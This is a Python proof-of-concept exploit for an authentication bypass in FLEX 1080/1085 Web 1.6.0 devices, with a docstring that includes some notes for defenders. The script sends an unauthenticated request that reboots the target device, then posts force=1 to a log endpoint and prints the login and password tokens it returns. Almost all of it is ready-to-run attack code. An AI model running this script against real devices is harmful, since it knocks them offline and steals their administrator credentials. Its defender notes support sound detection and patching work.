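#!/usr/bin/env python3
"""Proof of concept: FLEX 1080/1085 Web 1.6.0 authentication bypass.

What the script does, as far as this listing shows:

1. GET  <url>/sistema/flash/reboot
   Sent without credentials or a session cookie. The response is expected
   to contain the text 'Rebooting'. Side effect: the device restarts.
2. Waits a fixed 10 seconds.
3. POST <url>/sistema/log.cgi with the form field force=1
   Also sent without credentials. The response is expected to contain
   'user_param'; every whitespace-separated token containing 'login' or
   'pass' is printed.

Notes for defenders (derived from the requests above):

* Both paths answer a client that never authenticated, so access control on
  the management interface is the failing control.
* Requests to /sistema/flash/reboot and POSTs to /sistema/log.cgi carrying
  force=1 from hosts that hold no session are the log indicators to look
  for, together with unscheduled device restarts.
* NOTE(review): the reboot presumably repopulates the log with the account
  parameters; the listing does not show why the order matters. Confirm
  against the vendor advisory.
* Credentials on an exposed device should be treated as disclosed: limit
  reachability of the web interface and rotate them after applying the
  vendor's fix.
"""
import argparse
import re
import sys
import time

import requests
from colorama import Fore

# Upper bound, in seconds, for each HTTP exchange. Without it a device that
# stops answering (it is being rebooted) blocks the script indefinitely.
REQUEST_TIMEOUT = 15


def main():
    """Run the two-request sequence against ``arguments.url``.

    Reads the module-level ``arguments`` namespace created in the
    ``__main__`` guard below, so it is only usable when the file is run as a
    script. Exits with status 1 when a request fails or a response does not
    contain the expected marker text.
    """

    def banner():
        # NOTE(review): the spacing of the ASCII art is reconstructed; the
        # listing this was taken from had its whitespace collapsed.
        print('''
    ________    _______  __
   / ____/ /   / ____/ |/ /
  / /_  / /   / __/  |   /
 / __/ / /___/ /___ /   |
/_/   /_____/_____//_/|_|
 [FLEX 1080/1085 Web 1.6.0 - Authentication Bypass]
        ''')

    def fail():
        """Print the generic error line and stop with a non-zero status."""
        print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}Ocorreu algum erro')
        # The original called quit(), which is a `site` convenience and
        # reports success (status 0) to the calling shell on failure.
        sys.exit(1)

    def reboot():
        """Request the reboot endpoint and check for the 'Rebooting' marker."""
        try:
            r = requests.get(
                f'{arguments.url}/sistema/flash/reboot',
                timeout=REQUEST_TIMEOUT,
            )
        except requests.RequestException:
            fail()
        if 'Rebooting' not in r.text:
            fail()

    def extract_credentials():
        """Request the log endpoint and print the login/pass tokens it returns."""
        try:
            r = requests.post(
                f'{arguments.url}/sistema/log.cgi',
                data={'force': '1'},
                timeout=REQUEST_TIMEOUT,
            )
        except requests.RequestException:
            fail()
        # 'user_param' is the marker the script uses to decide that the
        # response contains the account parameters.
        if 'user_param' not in r.text:
            fail()
        for line in r.text.split():
            # Two independent checks: a token may match both patterns.
            if re.search('login', line):
                print(f"{Fore.LIGHTGREEN_EX}[+]{Fore.LIGHTWHITE_EX} {line.replace('login:', 'login: ').replace(',', '')}")
            if re.search('pass', line):
                print(f"{Fore.LIGHTGREEN_EX}[+]{Fore.LIGHTWHITE_EX} {line.replace('pass:', 'pass: ')}")

    banner()
    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX}Inciando a exploração')
    time.sleep(1)
    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX}Reiniciando o hardware')
    reboot()
    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX}Aguardando 10 segundos')
    # Fixed wait for the device to come back; the script does not poll.
    time.sleep(10)
    print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX}Hardware reiniciado com sucesso!')
    time.sleep(1)
    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX}Tentando extrair as credenciais')
    extract_credentials()
    print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX}Credenciais extraidas com sucesso!')


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', action='store', help='Target URL', dest='url', required=True)
    # Module-level on purpose: the helpers nested in main() read `arguments`.
    arguments = parser.parse_args()
    main()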